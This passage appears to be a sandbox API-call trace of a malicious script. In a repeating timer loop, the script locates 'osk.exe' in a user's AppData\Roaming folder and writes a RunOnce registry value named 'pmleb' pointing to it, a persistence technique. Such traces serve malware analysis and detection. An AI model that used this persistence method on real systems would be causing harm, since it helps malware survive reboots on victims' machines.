pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.456] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x37 [0081.456] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.456] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.456] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.456] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.456] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.456] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.456] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.456] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.457] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.457] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.457] RegCloseKey (hKey=0x280) returned 0x0 [0081.457] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.457] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.457] SetTimer (hWnd=0x20280, nIDEvent=0x20b3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b3 [0081.457] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.469] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.469] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.469] KillTimer (hWnd=0x20280, uIDEvent=0x20b3) returned 1 [0081.469] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.469] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.469] IUnknown:Release (This=0x787518) returned 0x1 [0081.470] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.470] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.470] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.470] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.470] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.470] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.470] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.470] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.470] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.470] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x38 [0081.470] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.470] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x39 [0081.471] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.471] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x38 
[0081.472] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.472] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.472] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.472] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.472] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.472] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.472] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.472] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.472] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.472] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.473] RegCloseKey (hKey=0x280) returned 0x0 [0081.473] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.473] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.473] SetTimer (hWnd=0x20280, nIDEvent=0x20b4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b4 [0081.473] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.485] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.485] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.485] KillTimer (hWnd=0x20280, uIDEvent=0x20b4) returned 1 [0081.485] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.485] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.485] IUnknown:Release (This=0x787518) returned 0x1 [0081.485] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.486] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.486] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.486] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.486] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.486] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.486] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.486] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.486] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.486] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x39 [0081.486] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.486] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3a [0081.486] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.487] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x39 [0081.487] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.487] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.487] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0081.488] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.488] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.488] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.488] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.488] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.488] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.488] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.488] RegCloseKey (hKey=0x280) returned 0x0 [0081.488] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.489] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.489] SetTimer (hWnd=0x20280, nIDEvent=0x20b5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b5 [0081.489] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.500] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.500] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.500] KillTimer (hWnd=0x20280, uIDEvent=0x20b5) returned 1 [0081.500] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.501] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.501] IUnknown:Release (This=0x787518) returned 0x1 [0081.501] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.501] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.501] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.501] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.501] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.501] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.501] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.501] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.501] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.502] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3a [0081.502] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.502] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3b [0081.502] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: 